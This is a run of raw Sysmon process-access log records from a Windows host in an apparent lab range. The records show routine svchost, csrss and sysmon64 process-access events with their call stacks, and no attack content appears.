13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009745Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009744Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1400-000000009A01}1276C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009743Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009742Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009741Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009740Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009739Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}588220C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009738Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009737Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009736Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009735Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009734Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009733Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009732Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009731Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009730Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009729Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1a375|c:\windows\system32\lsm.dll+23fc9|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009728Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.139{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23fc1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009727Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4750-6000-0205-000000009A01}47883304C:\Windows\system32\csrss.exe{08A6967A-4753-6000-0A05-000000009A01}4712C:\Windows\system32\efsui.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009726Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009725Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009724Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009723Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009722Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:55.123{08A6967A-4287-6000-0C00-000000009A01}5884880C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009721Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 